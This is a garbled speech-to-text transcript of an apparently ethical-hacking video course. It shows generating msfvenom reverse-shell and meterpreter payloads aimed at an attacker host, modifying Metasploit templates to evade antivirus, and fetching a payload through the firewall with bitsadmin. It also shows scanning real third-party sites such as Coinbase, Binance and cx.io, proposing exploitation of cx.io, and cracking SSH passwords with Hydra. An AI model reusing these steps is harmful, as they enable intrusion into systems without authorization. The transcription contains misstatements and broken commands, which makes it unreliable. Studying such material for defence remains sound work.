like to add some other rules here again. So now we have added inbound rule before. Now I would like to add outbound rule. So you just click on outbound rules. So click on add a new rule. Select here as a rule type as a port. Then you just click on next. So it will ask a specific port, otherwise something. So you just need to select all ports. Then you would like to click on next. So you would like to go for so as an block the connection is enabled. So you just click on next, and you need to name it as something like you can name it as this one. Port 21 is blocked. So you just click on finish. So we have successfully finished this one. So now we would like to look this one. Port 21 is blocked. So uh, you look the properties. Port 21 is blocked. Now we just look for a remote computer. Only allow a connections of these computers. I would like to skip the rules of the computers. You can specify a user on computer only when the connection. So that's not the thing. So where is protocol and ports? We would like to go here. Then we would like to enter as ports like a specified ports is 21. Then you just apply this. Then you just click on OK. So Windows is much more disgusting things here. So now we would like to launch a command prompt here. So just open a terminal as command prompt. So just open this command prompt. So now you just type here FTP, enter the targeted IP address 192.168.18.53. Now you can see here FTP connection is refused. We got it here directly, cannot connect. So I have blocked the FTP connection. That's it. So now if I was go here, it was blocked. When I go for disable the rule, now I just come back here. You just type. Now you can see here FTP is directly connected. So you just type here list not connected. You just type here exit. Exit. So it's not exiting. So I'm going to open any again as another command prompt. So once you open again another command prompt, you just type FTP, enter the targeted IP address 18.53. FTP connection was refused again. So now I try to come back here. This I would like to enable a rule. Now we would like to look here. Now I go to Windows Server 2016. So it's taking a much time to load these machines. So here you just still it was stuck. So you would like to look here. So we would like to look this one as an letter once it's come. So you just close this. So when you want to bypass this one, so you just need to open like HTTP port and enter the targeted IP address and a port, and you just need to add the rules and enter the FTP username and password, and you can create a directory then here it will be present the directory name. So it's blocking too much time. So we would like to go further without wasting much time. So we would like to go, I would like to close this. So we would like to go for another tutorial. So it's too much time taking and blocking and wasting much time. So we would like to go for as another tutorial is called so we just look here, bypass antivirus using metasploit templates. So antivirus software is designed to detect a malicious process or files and prevent their execution and endpoints. There are various techniques that can be used for bypassing an antivirus and execute the malicious process in the target machine. So we would like to come back here. So you just type here exit, you just type clear. So now you would like to write here MSF winner, and you specify the payload for Windows, and you just type here shell reverse underscore TCP lhost, enter the targeted IP address of your Kali Linux 18.26, L port equal to 444 minus F is exe, and just type here antivirus.exe. So it will generate a payload once payload is generated. So now we would like to open the Firefox. So now we would like to type here as virustotal.com. So payload is generated with 7 megabytes, 7 MB. So now let's see. So click choose an file here. So we would like to click on the home. So you can look here antivirus.exe. So just click on open. So it's checking the hash. So you just click on confirm for upload. Uploading 100% done. So now it will analyze the virus. Okay, now you can look here. So out of 73, you got it like 74. Out of 74, you got it as 63. So you need to decrease all those things. So you just look here, come back here. So you just type here cat user share metasploit. So metasploit framework. And just type data templates src, then you just type p exe, just type template.c. So here when you see here it was like written like include studio.h. So when you study the C programming language, you can understand very easily. So it's defining the SC size is 4096 is almost really considered as a 4 GB RAM. So character payload SC size is a payload So they have enter character payload. Character commit 512, int main int, arc character to arc, void payload and return to 0. So now you would like to modify this one as a template to uh, so now you would like to modify this one to as I just type here nano. So it's log nano. So you just copy this entirely. Just copy and paste it. So in that, so it will not run. So just type here. Yes, Control X. So so it will not execute here. So I just copy this user share metasploit. So I already have copied here. So we would like to open again this one. So now we would like to type here. So you just type here sudo su and enter the password. So you just type here nano and paste it this. So now we would like to go as an payload size is 4096. You just need to replace as we would like to replace as this one as 4000. That's better. Control O and Control X. Now we have our payload is template.c. It's like 4000. So now you don't need to worry. So now we would like to go here. You just type here I 686 W634 W32. So I would like to go here because cd and paste entire of the command exe. Now I would like to write here I, so just type here list. That's it here have. So you just type here I686 W64 Ming W32 minus GCC, and you just type here template.c and you just type here minus ELW S2 underscore 32 output for evasion.exe. So you just type list. So you just type here move evasion.exe to Pentester Club. That's better. So so I don't like to move this a version to there. So just go back cd go Pentester Club. Now just move evasion.exe. Come back here. So you just paste it here. Go to an exe templates. Now you just type exit this one. So you just also clear. So now I would like to do here is again as MSFina payload. So I would like to change. Here is port is 000, and I would like to change uh, antivirus to AV. Then the payload will be created now. So here the payload will be created, but there is a small mistake. I would like to remove the av.exe. Now I would like to create as an same thing. Okay. Uh, so I just specify as an X, and I would like to specify the path of the folder. So I just need to remove this exe to evasion.exe, then minus f exe to av.exe. That's it. So here that will be reduce the risk of the your payload app or any type of Android app. Otherwise Android app, any type of shell app. So you can see here it will got a 10 MB. Now we would like to upload a new one. So now we would like to go for antivirus. We would like to look here, come back. So again, you just upload a file. So where is your antivirus? This one. So you just click on this. It was checking the hashes. So you just click on confirm and upload. So before is 6 for 74 is 63. Now we would like to look how much we can get it here. So now you are getting a reduce of the risk of your payload. So you are making as a crypt of your payload, crypting. So it's not detecting much. When you see here, it's not detecting much. So it will not cross more than like 47, otherwise 50. So it's only 100 kilobyte. So you can see here. So this is how you can observe now like 46 now 46 of threads by 71 of the malicious files. So thus we can avoid antivirus detection by modifying a Metasploit templates. You can see here 47. That's it. So now we are avoided directly. The risk compatibility is by 50-50 percentage. So now we would like to go for another tutorial is bypass a firewall through Windows bits admin. So just type here. Bypass a firewall using firewall through Windows bits admin. So bits background intelligent transfer service. It's an essential component of Windows XP and later version of Windows operating system. Bits is used by system administrators and programmers for downloading your files from or uploading your files to HTTP web servers and SMB file shares. Bits admin is a tool that is used to create, download, or upload jobs and monitor their programs. So, we would like to go to our Windows system. So now we would like to open a control panel. So we would like to system and security, open Windows, Defender or our firewall. So our firewall is activated. So I would like to switch off our firewall. So you just turn off, then click on OK. So now we would like to come back here. So now I would like to open a terminal. So you just type here msfvnum -v Windows meter printer at reverse underscore TCP fpost equal to 192.168.18.26 L port equal to 12345 and minus F it is in exe. I would like to go here bitadmin.exe. So I just created as an bitadmin.exe folder. So now I would like to type here sudo service apache to start. So once you go here, your Apache 2 server, look here, come back here. So we would like to enter the targeted IP address. Yes, it was working. So now we would like to look here. You just type sudo su. So I don't need to explain all those things for sharing these things. So I was explained in system hacking. So you just move here, move of the bitadmin.exe to where www html are shared. So I have successfully shared my bitadmin. Now I would like to go to here to as a share directory, share. So here is my bitadmin. So I have successfully downloaded. Now I just need to go to my bits admin, just go to a download. So I just need to like copy one file, like copy. I just go to a C folder. So otherwise I would like to do here as one thing. So before for downloading, so I would like to delete this and I would like to go to my Firefox and here also I would like to click on show all downloads. I just clear all my downloads. So now I come back here. So I just close this. So now you would like to look here as uh, Windows PowerShell. So I would like to run this as an administrator. Then it will ask a permission. We would like to, yes, it was running. So now just type here bits admin and just type here transfer of exploit.exe from HTTP. Oh, sorry, not exploit.exe. It's bitadmin.exe to just type HTTP. Enter the target IP address 192.168.18.26 and /share. at forward slash bitadmin.exe. That's it. Bitadmin utility, a copyright invalid argument. So what is the how we would like to get it here? Okay. And I would like to share, I would like to copy this one in my C folder as bitadmin.exe. So now you can see here it was bitadmin. So downloading state is transferred successfully. You can see a transfer completed. So now I would like to go to my folder of C folder. Oh, sorry. I would like to go my C folder. You can see here, I directly got the bit admin here. So after transferring the malicious file, the attacker can use this malicious file for gaining access and escalating a privilege and perform various malicious other activities also. So this is how you can bypass the firewall through a Windows bit admin. That's it. So now come back here, close this. So now we are going to go for another task is number 12, hacking web servers. So how we can hack a web servers? So we'd like to look here. So hacking web servers involves for exploiting the vulnerabilities in the web software, web application, or the underlying operating system to gain unauthorized access or disrupt a service or steal a sensitive data. We can use like SQL injection, like impact, prevention, cross-site scripting, or much more useful information we can use, like CSRF attack, like the directory traversal, local file inclusion, remote code execution, brute force attacking. Then we would like to do like DOS attack, HTTP recalls, and much more informations we can exploiting a common vulnerabilities also we can find out here. Uh, so our first task is we just look here information gathering using Ghost Eye. So Ghost Eye is an information gathering tool written in Python 3. To run Ghost Eye only needs a domain or IP address. Ghost Eye can only work on Linux distributor. So Ghost Eye gather information about who is lookup, DNS lookup, Ether app, Nmap port scans, HTTP headers, grabbers, click tracking tests, robots.txt, scanners, link grabber, IP location finder, trace route, everything. So for that we would like to switch to our Kali Linux, open a terminal, use type here exit, use type clear. So use type here git clone, https, use type here github, and use type here github.com, bool I 0 ghost.git. Oh, sorry. Ghost, ghost I. So I would like to get it from here. Use type here ghost I github. So we just click on this. So just copy, otherwise from the code, just copy this word. Now come back here, just type here clear and you just paste. Oh, sorry, git clone, paste it. So we just type here cd ghost I. You just type here clear. You just type this. So you just install requirements. So once you have installed the requirements, so now just type again here clear. You just type list. So here you have ghost I. So you just type here Python 3 and ghostI.python. So you need to get like graphical network monitor of the root. So you just type here, enter your choice of one. So that's as an invalid lookup. So we would like to look for DNS lookup. You just need to enter as a domain. Uh, so it shows something about the domain. So I need to enter the targeted IP address. So I would like to enter for targeted IP address. I just type 103.175.175. We would like to look here. So it was give all the information like you can see here, CMD, all the information. So we would like to go for choice Cloudflare cookie scraper 8 and the domain is I just use paypal.com. So target for paypal.com. Now let's see. So this is a Cloudflare detection. You can look here. FPT, graphical user interface. This is an identity. We got it one thing. PayPal objects marketing resource, the identity of JavaScript. So all the informations you can get it here in the list. You can look here. So you can try what else you like in the several way like HTTP header grabber. So you just type 5 and you just need to get it from the like bugbounty.com. We would like to look. So not found. We would like to crawler of a URL of the target. So you just type the T. You would like to look for uh, facebook.com. So that will not crawl definitely because it's a high secure targeted website. You can see here it shows for index everything it shows, but we prefer not get where we can get it from this. So it's have multiple rules here. So we would like to look here. We would like to do a trace route on platform.x.com. We would like to look. This will take a moment, get for coffee. So it's not get it. So we would like to look for HTTP header grabber. So we would like to look for yahoo.com. So not found. That's it. So you can try multiple ways. So however you like. So I just exit. So now we go for second task. Perform a web server reconnaissance using skip. Perform web server reconnaissance using skipfish. So, skipfish is an active web application deployed on web servers. Security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a recursive crawler and dictionary-based probe. The resulting map is then annotated with the output from the number of active and security checks. The final report generated by the tool is meant to serve for a foundation for professional web application and security assessments. So we would like to go. So we would like to come back here. So just type here. You just type here skip page minus minus help. So here have skip fish. So we would like to enter our post, otherwise target. So we just I would like to use here skip fish minus f, and I would like to look first open as a new tab. So directory master and http test dot test php dot vulnerweb.com. I would like to make it big. So I would like to use as one list as this one. Just copy this one, come back here. So just type here skip fish. So I would like to get the output as uh, hope Pentester Club, and I would like to save as one web, and I would like to specify as a word list as this one. Then I would like to go for HTTP. So now I would like to go for this targeted domain. So just paste it. Word list uses a syntax error in the line 0. Okay. Minus f. So just type just type clear. So just type here skip fish and just enter only the targeted IP address. HTTP test.php dot vulnerweb.com. So directory is not specified. So I would like to look here one more time. So you just clear here, you just look here again, skip fish minus minus help. So now we would like to do here, you just type here skip fish. I would like to get as an output here is Pentester Club. Pentester Club. And I would like to create as a directory. So I here make directory one web. Oh, sorry, remove minus rf one web. So use try. So just type list cd one web. The list is here. Okay. So you type cd, you type here. So here, once you go for here, you just type here vulnerable. And I would like to give as user share, then I would like to go for, I would like to give as only a skipfish directory, skipfish, skipfish, just go for dictionaries, and complete.sh, complete.wl. So what list? You just type here test.php dot vulnerweb.com. So you just enter. So it's not absolute URL. Okay. So we have change. Yeah. So we would like to look here. Come back here. So while doing this type of complex task, you need to look very carefully. Test php dot vulnerweb.com. So now it was started the skip fish. Now just wait for 5 minutes. Then we would like to look for another task. So let it complete. We would like to look for another task right now. Later we would like to look this one. So we would like to go for another task. Is like go for another task. So footprint a web server using the HTTP record. So, web applications can publish information, interact with internet users, and establish an e-commerce or e-government presence. However, if an organization is not uh, in configuration and operating system is in public website, it may be vulnerable or a variety of security threats. Although the threat in cyberspace remain are rarely the same of the physical world. Fraud, theft, vandalism, and terrorism, they are the far more dangerous organizations and face monetary losses, damage and reputation, and legal action if an introducer successfully violates the confidentiality of their data. HTTP Recon is a tool for advanced web server fingerprinting. This tool performs a banner grabbing attack, a status code enumeration, and header ordering analysis on its target web server. So we would like to install this. So until this one is completed, we would like to go for Windows 11, Windows 2019. So now we would like to go for web servers. So we would like to look for HTTP record. We would like to install this HTTP record. So it's not come. We would like to look here HTTP record. It's not come. So we would like to look here. Open new tab. Just type here HTTP record. So an advanced web server gathering. So we would like to look here. So we not yet get how to install this one. We would like to go for back here. Look this. So we So I would like to go for run as an administrator. We would like to look here. Yes. Now we have successfully got this one. So now I would like to enter my targeted IP address, otherwise domain. So I just type here coinbase.com with the port is 80. Then I would like to go for analyze. So, warning, one of the received HTTP response header or GET request have head of the length of 174 bits. The fingerprint may not be possible or not accurate. So, now we can see here every information you are getting about this targeted information. So, what are the services they are using? In Apache, Microsoft Windows Server 6.0, Sun 1 web server. So even you can exploit this one. So you can get it the in exploit database about this OS with the version. So before 6.1 also you can get a version updated. So Apache versions is easily to exploit it. So AOL server. So AOL server is also we get to know about this one by if you go to exploit database you can search that AOL server. Lightspeed web server. So you can see here email Microsoft ISA server 2006, Netscape Enterprise server 6, Nginx. They are using Nginx, and we go for anti-web HTTPD and beta. Then Squad, Job, Netboot. So there is using also a bots. You can look here. Every information we get it from here about the targeted information. So our target information is coinbase.com. We got it here, coinbase.com. So you can explore furthermore Sonic Wall CMS. So they are use Coinbase in Sonic Wall CMS. So we would like to look that where is we would like to open new tab Sonic Wall CMS or Central Server CMS. So they are used for this uh, service CMS template. So once you get the CMS template, you directly exploit it the Sonic Wall CMS template about that Coinbase. So it's very easy, crucial way to perform all the penetration testing. So you need to know the analysis first, network analysis and the product. Otherwise, when you go for any one of the targeted website, you need to analyze the targeted website. So HTTP recon is the best tool for getting all the information. So I identified directly now here the Coinbase of which was hosted in the CMS. So long request, get non-existing, get wrong protocols, connection type and length, serial HTTP head existing, option command we would like to look here, delete for existing, test method, attack request. So they put a firewall, that's why you got here 4043 forbidden. So you can't able to access this one. So I have shown you while getting in the FTP. So I can't able to perform FTP because the firewall is putting and even my system is tracking on Windows. That's it. So now we would like to quit this. So now I would like to complete the previous task of this skip fish. Now the time is enough for giving this one. So you just control quit. Now you would like to look for Pentester Club 1.5 index.html. Now we would like to come back here. This also we would like to look here. Where is this? Look, scroll down. So vulnerable, you would like to look here as here index.html. Open with Firefox. Now you can look all the query injection vector. So application or XHTML is 8, text.html 8, text.plain. So issues type, you can look here, scanner version 2.1 byte, random seed is an offset address, scan date, total time, everything. So we would like to click on this query type. Uh, the product ID, we would like to open in the new tab. So you can look here, this is going to form as an SQL injection also. So this will exploit for SQL injection, query injection, inserting a server messages. You can look here much more. So you can go for accesses like cross-site scripting, comment.php. So he was written here as an accesses like here also. So you would like to click for more traces. So you can look all the more traces here also. So you can write your own advanced report here. That's it. So while trusting all these advanced trusting platforms by artificial intelligence, you not gain knowledge. So you need to do it practically. That's it. So now we would like to go for another targeted tutorial. Come back here. So we just type for, we just type here footprint a web server, footprint a web server using ID So, must be familiar with the banner grabbing techniques to monitor a server and ensure a compliance and appropriate security updates. This technique is also helps in locating a rogue servers or determining the role of servers within a network. This lab manual helps for understanding and learn the banner grabbing technique using IDServe, which allows an attacker to determine a remote target system. So now we would like to uh, close this. Now we would like to come back. So this we would like to close this, come back here. So we would like to open our id.serve. So open this id.serve. So we would like to enter a copy or paste of internal server URL. So we would like to type as your targeted IP address. You just type here HTTP and you just type here paxful.com. Then click on query this server. So now you can see here the server is identified itself by Cloudflare and Cloudflare Ray ID and its connection is closed. So it's not going further. So after obtaining this information, the attacker may perform like a vulnerability analysis on the particular version of the web server and implant a various techniques and perform an exploitation. So I would like to go here one more thing. Here is oneweb.com. We would like to identify this. It's in Apache server. Now I would like to go for like any type of targeted website like I would like to visit like what type of target website we would like to visit is visit the uh, google.com, then we just type search GWS server. So once you identify this server, so we would like to look and identify the servers. ATS. So this task is completed. Now we would like to go for another task is number 5. Footprint a web server using Netcat and Telnet. So we just type here footprint a web server using Netcat and telnet. So netcat is a network utility that reads and writes a data across the network connection using a TCP/IP protocol. It reliable backend tool used directly or driven by other programs and scripts. It also a network debugging and exploration tool. So what is telnet? Telnet is a client server network protocol. It's widely used on the internet or LAN. It provides the login session of for a user on the internet. The single terminal attached to another computer emulates with the telnet. The primary security problems with the telnet are the following. It does not encrypt any data sent through the connection. It lack of authentication scheme also. So now we would like to look this. So we have done all those things. Back here. It's also. So now you just type clear, just type netcat minus pv. So I would like to type here www dot. I would like to use like what we would like to use any type of uh, binance.com and just type 80. So you can see here you've gotten like network is failed. So once that is done, you just type so here we got it like Binance, so it was sent. So we would like to try again. We just type get /http and /1.0. Then you can double tap. So you can read all about the Binance in HTML. So we got it like port 400 as a BAT request, server in CloudFront. Now we would like to look here via this. We need to decode this one. Then Amazon CFI ID. So this was in base 64. We would like to look this. We just copy this. We just type here echo. Then we just paste it here. Then you just type base 64 decode. Otherwise 32. Base 32 decode invalid. So based on this, we would like to do the subset not found. So maybe which type of encryption is this? No have. So okay. So we have done the netcat. So now we would like to do the telnet. Telnet, I would like to use the PayPal. So I just type here get the same thing like HTTP 1.0. Then you just double tap. So the connection is closed and you can see here all the parsley error unknown domain. So okay, now we would like to go with the trying with the targeted IP address. Now let's see. So we would like to type here get /http and 1.0. So it tried to connect, but we don't have any type of ports to connect over there. That's it. Yeah. So this is how you can perform all the here. So now we would like to go for number 6 is enumerate a web server's information using Nmap script engine. So I'm just putting this. So the web applications that are available in the internet may have vulnerabilities. Some hackers attack strategies may need the administration role on your server. But sometimes they simply need a sensitive information about the server. Utilizing nmap, http enum.nsc content returns a diagram of those application registries and record uncovered. This way, it is possible to check for the vulnerabilities or abuse in the database. Through this technique, it is possible to discover a genuine security imperfections on the site, such as some sites like WordPress, otherwise Photoshop, that maintain accessibility to envelope that want to be an erased. Once the task has been settled, once you have identified the vulnerabilities, you can discover it or fix it. So now we would like to do that one. So you just type sudo su and enter the password. So you just type nmap and you just type -sp script http in a wordpress.com. So in the wordpress.com, what else you have, you can look it out here. Now we would like to open new tab. You just make it big. Just type nmap --script. Oh, sorry. I would like to run on sudo su and enter the. You just type nmap --script and you just type hostmap -bfk and you just type again a script args hostmap bfk dot prefix equal to, you would like to get the host map, then you would like to enter the targeted website is like, you just enter as blockchain.com. Now let's see. So the WordPress is running with the Nginx server, that's it. So now we would like to look another one. So while coming that one, we would like to trace as nmap --script and I would like to type http trace. I would like to trace the domain of hostinger.com. So the result is game. Now you can see here discover ports. And here also you can see here the HTTPS alternative. We got it in the blockchain, this one also. So I would like to identify another one, nmap port 80 and script and the IDs and IPs WAF is present or not. So but we are not getting anything else here. So it's no how. But the security is very strong here. Now we would like to go for another targeted website tool. This name called Uniscan. So we would like to look here. That's it. So you just type here clear. So what is Uniscan web server fingerprinting? Uniscan is a vertical server footprinting tool that not only performs a simple command like ping, traceroute, and nslookup, but also does a static and dynamic stress check on web server. Apart from scanning website, Uniscan also performs an automated Bing and Google search and provides IPs and Uniscan tasks all of this data and combines them into a compressive report file for the user. So we would like to look here. So I already installed the Uniscan. -u defines the username, domain. I would like to go for a google.com -q. So it will generate and look what else it have hidden directories and server we have seen before. It was GWS, the targeted IP address. Now you can look here action, accessibility, ad, account, AdSense, advertising, alerts, Android, analytics, multiple things is available here. So you can look it out here. So when you come back here, we would like to look for again Uniscan -u and I would like to look for paxful.com and I would like to look like, so I would like to choose another target domain cx.io and then I would like to type -d So it will look entire of the domain like plugin name, everything you can look here. Now crawling, 2 of 2. So the crawling will take lot of lengthy time process. Okay. Uh, time harm. There is a vulnerability. You can look here. Uh, time harm. So you can look here. Blind SQL injection, local file inclusion, PHP CGI arguments, SQL injection, cross-site scripting, web shell finder. But we got it here as an payload. As what is this? Is time tim term. I prefer not to pronounce this. Tim term. Okay. So just open your tab. You just type here. Tim term exploit db. You just enter like this. Then we would like to look here. So there is a WordPress plugin exploit here is available for the cx.io of the targeted website. So you can use this WordPress website in the cx.io, then you can exploit. Here you can see here a long cat, that is word thumb. It's also called as a tip thumb 2.8.30. So it's like web short remote code execution. So here also is available here. So this and all you just need to use the WP plugin or WP scan. So they was posted in the cx.io in less than 1.33. So we got it here as above 3.3. So we're gonna exploit this targeted website. So now you can see here this is how you can find like a getting a directories check for with Q. So to get a directories listing with an exploit is -t. That's it. So this is how you can perform Uniscan. Now we are going to crack FTP credentials. So a dictionary or a word list contains thousands of words that are used by password cracking tools. To break into a password protected system, an attacker may either manually crack a password or guessing, or it use an automated tools or techniques such as dictionary method. Most password cracking techniques are successful because of weak or easily guessable passwords. So when you come back to your event machine, you just enter your password. So this is your event machine. So you just come back here. So you just type here. You just type here as clear. You just type here exit. So you just type this. Okay. So I just already have here. You just type here cat user.txt file, and I just type here cat password.txt. No have. So just type here nano password.txt. So just type here just as it is, just type Control O and Control X. So just type cat password.txt. Okay, no worries. So just type clear. So now I'm going to discussing like password cracking. So here password attack. So you just use a civil, crunch, hashcard, hydra, John Ripper, Medusa. Medusa is a powerful password cracking, and Crack, OPH crack, rainbow crack. It's also most powerful thing to crack this one. So now we would like to look a rainbow crack that will become with the graphical user interface. Otherwise, okay, no worries. Now I would like to go for only a Hydra. Now you just type here Hydra. Ah, minus minus here. So I just type here again Hydra minus H defines for help. So you can look. If you know the login file, you just enter. If you don't know the password, you just need to put for capital P. So now we would like to type here clear. So you just type here Hydra minus L for user.txt and minus P. I don't know the username and password, so I'm just giving as a capital. So if I know the username, I don't need to specify capital L. So I specify small l. So now you just type here password.txt. Now I would like to specify the target IP address 192.168.18.27 and it's for SSH. So if you want to crack for another thing like FTP, you can mention FTP. Then if you crack for website details, so you need to provide with HTTP, targeted IP address and login details. That's it. So you have successfully cracked the password here. So this is how you are crack the passwords. So if you want to log in, like you just type sh pcpl and enter the password. You have successfully logged into the targeted system. So you just type here ipconfig. So you just type IPA. You got it here IP address. You can look here successfully. So you just type here exit. You just type here clear. So now you just type here. We would like to go for another targeted website. Tutorial is number 30 is hacking web applications. So we are going to do this hacking web applications in next tutorial. So now we are discussing about hacking web applications. Hacking web application typically involves for exploiting vulnerabilities in the web application code, design or configuration to gain unauthorized access or manipulate the applications in unintended ways. So here we are going to do like SQL injection, cross-site scripting, cross-site request forgery, remote file inclusion, local file inclusion, directory traversal, command injection, authentication bypass, session hijacking we done in previous in session hijacking, and security misconfigurations. So what are the how to prevent all these type of attacks? A developer should be prevent like validate and sanitize all your inputs, user parameterized queries, or prepared a statement for databases access, implement a proper authentication and authorization mechanism, that use HTTPS to encrypt the data in transit regularly, update and patch the software dependencies, conduct regular security audits and vulnerability assessment. So our first task is here. Just enter here. Perform web application reconnaissance using Nmap and Telnet. Just type here. Perform web application reconnaissance using Nmap and Telnet. So, in web application reconnaissance, you must and should perform various tasks such as server discovery, service discovery, server identification, or banner grabbing, and hidden content discovery. A professional hacker or a professional ethical hacker or penetration tester must gather much more information as possible about the target website by performing a web application footprint using a various techniques tools we are using for this. So first we would like to look this one first. Come back here. So first open the terminal. So you just type sudo su and enter your password. So now just type here nmap minus T4 minus A is an aggressive scan and enter. So now let's wait for the error result. So we got it here. So we got it the nmap result. We tried to connect with this one as an telnet. So just type here telnet, enter the target IP address 192.168.18.30. So telnet is refused here. So you can try with another targeted domain name. So just type nmap minus t4. Now you just type here like google.com. We would like to look here. What else we can get it? So it will take some results to get it this one. So now we would like to look this another task. So let it come. So number 2 is perform a web application recognizes using what web. So we would like to look this. What web identifies a website and recognize web technologies, including content management system. So you call it as simply as CMS content. Blogging platforms, statistic and analytics pages, JavaScript libraries, web servers, and embedded devices. It also identifies version numbers, email address, account IDs, and web framework. So we would like to look this part. Come back here. So just type clear. So just type here what web. So you will get some information like you just type here what web URL. So you just type here what web I used to use for coinbase.com. Now let's see. So it's taking too long, lengthy time process to come. So now we are going to get, you can see here, country in United States, HTTP server with the Cloudflare, everything. So now I would like to get as an result in one of the targeted website, like you just type here touch Coinbase underscore report. So just type cat Coinbase. So I would like to write as an now to get this result. So now I would like to go here. What web? I would like to use a verbose, and you just type here coinbase.com. Now you can look here, all entire of these things it will be present. HTTP headers, and you can look here every single information about the targeted website. You can see the HTTP server, HTTP only, the string. So the caches will be stored here, HTTP cache. Then cookie, everything we are seeing. So now you just type here again what web, and you want to store this result. So you just type here log, and you just type here verbose equal to Coinbase underscore report, and you just type here coinbase.com. That's it. So here you got it as Google result. So one is available with 80, another one is available 443, another one is available with, we would like to look here, name servers, Android Google content network. So you can see us here. So next service fingerprint. So these fingerprints are most important to access this Google. So you just look this netcat google.com, and you just type here 80, then look here. Oh, sorry, this is telnet, right? So telnet google.com and 80. So connected to Google. So just type list. So we are connected and we are getting somewhat results, but we cannot able to look here. It shows like malform or illegal request. So Google is type, it's an illegal request accessing this one. So I have got it here. Now just type here get Coinbase underscore report. So you see we have saved in one txt format. all record of Coinbase. So that's it. So you can perform using this one. So now come back here. I would like to look here. Let's jump. So our next tool is number 3. Perform web spidering using OS job. So OS job jet attack is an integrated penetration testing tool for finding vulnerabilities in web application. It offers automated scanner as well as set of tools that allows you to find security vulnerabilities manually. Job provides functionalities of a range of skill levels for developers to tester to new security testing. Who is going to start like a basic level of penetration testing, so they can use this job, so that will crawl entire of the targeted website or hidden website, what else you can't able to visible when you go for targeted website. So this job will extract and give you on one report. So now it's loading here. We would like to look here. Let's type clear. This also is type clear. So let it load. This one we are move forward with this. So now you just click on start. So click on automated start. Now you just enter the targeted website. You just enter test.php. You just type vulnerweb.com. Then click on start for attack. So now it will start for attack. Now you can get and report here. So once you go for click on alerts, you can look here content security, CSS missing attackers, session management report identifiers. So once you look here, get test.php. So you can see your test.php risk level in the medium, confidence level is high, parameter, attack, evidence, CVE 639, WASC 15, source is a passive, content security policy, header not set. So they was written here. So when you're doing like hacker F1, hacker one, background or something else. So this one is more helpful for you to go for scannings. And it will report generate a report also. So you just click on the report on this, generate a report. Then you just click on generate a report. So the report is generated. If you want to look this one, I would like to show you here. As here, so it's keep on going. Once you go like this here, I would like to come back here. So it's automatically open. You can look here. The report. You can look. The job scanning report, content about the report, about report for parameters, summaries, everything it was written. So you can study entire of this one. So you can see here high, medium, low. So information. So you need to report for this to the organization like this. So you need to also make a video where is the default, then and only they're gonna pay you a bounty, otherwise they don't want to pay you anything else. So they just say, yeah, we have got it this one, so they say just bye bye. So you can see every information we got it here. So timestamp disclosure, so they are getting with an URL, so modern source key ID, so cheat sheet directories. So you need to report and submit like this to either in HackerCon, otherwise HackerOne, and as well as Workaround, any other some platforms. So your organization, if you're working for an organization, you need to provide like this. So you need to write very high in this way. So I'm just closing this one now. So this is how you can perform of jump spider. So I just close this. Now we would like to go for, okay. So come back here. Number 4. Detect load balancers using various tools. So organizations use load balancers to distribute a web servers load over a multiple servers and increase the productivity and reliability of web application. Generally, there are two types of load balancer, namely we call it as DNS load balancers. It was work on layer 4, a load balancer, and HTTP load balancer. It works on layer 7 load balancer. You can use various tools such like deep load, otherwise load balancer, detect. So the load balancer of the target organization along with the real IP address, we can see here any one of the targeted website, even they put a Cloudflare or etc. thing. So we would like to look here, come back here. This page, you just type here. You just type here dig. You just type yahoo.com. You would like to look here. You are getting like the real targeted IP address answer sections. So this is an cookie value. That's it. So you would like to look for load balancer, LBD, and you just type here yahoo.com. So you can look here, that was giving ATS check. HTTP load balancing server, it was checking. Let's see what's the result, we can get it. So it's not coming, so just type here exit. Coinbase.com. So now we would like to look here. So it's taking little bit time to come the result. Okay, little bit. So now we would like to go for another tutorial. Is identify web server directories using various tools. Identify web server directories using various tools. So web server hosts a web application. Therefore, misconfiguration in the hosting of web application may lead to an exposure of critical files and directories over the internet. A professional ethical hacker or a pentester must identify the target web application files and directories exposed on the internet using various automated tools such as Nmap, GoBuster, and DirectoryBuster. This information further helps in gathering the sensitive information stored in the files and folders. So first we would like to choose this also, okay, this also completed. So we just type here, you just type here sudo su, and you just type here clear. So first you just type nmap minus t4 minus as an address, so sorry, minus sv, and I would like to type the script http now. So I just use my targeted IP address is 113 and you just enter. So now let's see. So in a real time, an attacker uses various techniques to detect vulnerabilities in the targeted web application hosted by the web server. Either you can gain administration level access of the web server or retrieve sensitive information stored on the server. Attacker uses a nmap nsc script that http enum to enumerate the application directories and files of the web server that are exposed on the internet. Through this method, attacker identify critical security vulnerabilities on the targeted web application. So in my targeted hosting web application, you can see here one is available with a 22, another one is available with 18. So there is an HTTP server header, is an Debian hosted in the HTTP enum. I got a WP enum, readme.html, WP include, WP login, everything I got it, WP admin, every information I got here. So now we would like to use as Now using with this one, so I just type here as exit, you just type here clear. So you just type here go buster directory minus u http and enter the target IP address 192.168.18.13 and you specify the word list. Word list is user share word list directory buster, and I would like to copy this. Start clear. So I would like to use a medium.txt file. Copy this one, come back here. So I preferably say, if you want to get like any type of targeted list like PHP list here, then you just need to get with extension of any file PHP, comma .html. Then you would like to get like .txt. Then you would like to get like .js file, otherwise anything like Ruby, otherwise comma.sh. So this type of files you need to specify like this. So now it will start for gathering information. Now you can see our index.php that was presented. So it will take a bit of time. So now just come back here, you just type cd, you just type clear. So you just type make it big. So now I would like to use the same directory buster http and enter the targeted IP address 192.168.18.13. So this will also gather the same information what else you can look also here. So now you would like to look here. So you can see here wp include readme.html where we can get it in the before for going for HTTP enumeration of the web directories. So now we would like to look here. So that's enough for us. So we would like to look here. Another targeted tool here is, so we would like to look here cd directory search list. So I already installed this directory search. So you just type here Python 3. So I already installed the pip3 minus. So for you, I would like to write again here pip3 minus pip3 install minus r requirements.txt. So I will install the requirements. So it's taking time. So because of its loading is taking time, so it's also the same thing, wp include, wp content, wp admin. So I just quit this, you just type clear. So now we would like to look this, it was installed. So you just type clear. So you just type list. So you just type here Python 3 directory search dot Python. So it was showing targeted URL. So you just type here directory search minus u http enter the targeted IP address 18.13. That's it. Now you can look here everything. So it will start for gathering all the information. So if you want to get an extension, so you just specify the targeted domain and minus e for extension. So that will give all extensions. So what type of extensions you require, that will be print everything. So that's it. So now we would like to go for another tutorial. So our another tutorial is number 6. Identify clickjacking vulnerability using clickjack POC. So clickjacking is also known as UI Redux attack. Occurs when an attacker uses multiple transparent or opaque layers to trick a user into a clicking on a button or link on another page when they are intended to click on top level page. Thus the attacker is hijacking clicks means for the top level page and routing them into another page, most likely owned by another applications, domain or both. So now I would like to look here. So Siri, let's type here click jack views. So I already got it this click jack POC. So you just type list here, just type here 